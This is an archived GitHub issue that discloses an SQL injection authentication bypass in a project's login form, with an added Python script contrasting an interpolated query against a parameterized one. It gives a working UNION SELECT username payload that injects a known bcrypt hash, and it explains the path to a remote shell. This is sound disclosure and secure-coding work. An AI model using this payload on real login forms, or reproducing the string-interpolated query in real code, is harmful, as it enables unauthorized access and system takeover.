This repository was archived by the owner on Sep 23, 2022. It is now read-only.

SQL Injection based authentication bypass in login form #1

@rootabeta

Description


Submitting a tailored credential pair allows for SQL injection, leading to authentication bypass.
This is done by setting the username to

DOESNOTEXIST' UNION SELECT '$2y$10$woi3e0Fd.JeXz882gZHHQOBu7BzJ7Z3EzQ6IUxBZ4d3rEFw5zk2..'; -- -

and the password to "password" (without quotes) and performing a login attempt.
The key points:

  • DOESNOTEXIST is a string meant to prevent false positives. This prevents the original SQL query from matching (unless a user called DOESNOTEXIST really does exist - you can change this string to something random then).
  • $2y$10...k2.. is the password hash for the password "password" (without quotes)
  • password is submitted as the password
The union select forces the attacker-controlled password hash into the list of hashes matching the user (thus, since no user is named DOESNOTEXIST, returns nothing - meaning the only result is the attacker-controlled one), which then matches against the password that the attacker also supplies. This fools the system into believing the attacker has supplied valid credentials and grants full access to the control panel. From there, an attacker can create an interactive command session on the target and gain control over the system directly via a remote shell.

This exploit IS NOT CONTINGENT upon preexisting conditions or user interaction, and ranks a 9.7 (Critical) CVSS score.

Recommendation: use parameterization to prevent SQL injection in all places where user input is passed to the database.
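The following is an added illustration of the query-level mechanism described in the report and of the recommended fix; it is not code from the affected project or from the reporter. It assumes a `users` table with `username` and `password_hash` columns, an SQLite database, a single legitimate account named `admin`, and a placeholder string in place of that account's real bcrypt hash; all of these are assumptions made for the example. Whether bcrypt then accepts the supplied password is left to the application's verifier; the point shown is which hash reaches that verifier.

```python
import sqlite3

# Constructed sample data: a placeholder stands in for the legitimate user's
# real bcrypt hash (hypothetical value, not taken from any real system).
LEGIT_HASH = "$2y$10$legitimateUserHashPlaceholder0000000000000000000000000"

# The bcrypt hash for "password" quoted in the issue report.
ATTACKER_HASH = "$2y$10$woi3e0Fd.JeXz882gZHHQOBu7BzJ7Z3EzQ6IUxBZ4d3rEFw5zk2.."

# The username payload from the report, built around the attacker's hash.
PAYLOAD = f"DOESNOTEXIST' UNION SELECT '{ATTACKER_HASH}'; -- -"


def make_db():
    """Create an in-memory users table with one legitimate account (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", LEGIT_HASH))
    return conn


def fetch_hash_vulnerable(conn, username):
    """String-interpolated lookup: the attacker's quote closes the literal and the
    UNION appends a row the application never stored, so the hash returned is
    the attacker's own."""
    query = f"SELECT password_hash FROM users WHERE username = '{username}'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def fetch_hash_safe(conn, username):
    """Parameterized lookup: the whole payload is bound as one username value,
    so no row matches and nothing attacker-controlled is returned."""
    query = "SELECT password_hash FROM users WHERE username = ?"
    row = conn.execute(query, (username,)).fetchone()
    return row[0] if row else None


def compare_lookups(conn, username):
    """Return the hash each variant hands to the password verifier."""
    return {
        "vulnerable": fetch_hash_vulnerable(conn, username),
        "safe": fetch_hash_safe(conn, username),
    }


if __name__ == "__main__":
    db = make_db()
    for user in ("admin", PAYLOAD):
        print(repr(user[:20]), compare_lookups(db, user))
```

Run as a script, the legitimate username yields the stored hash from both lookups, while the payload yields the attacker's hash from the interpolated query and nothing from the parameterized one.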
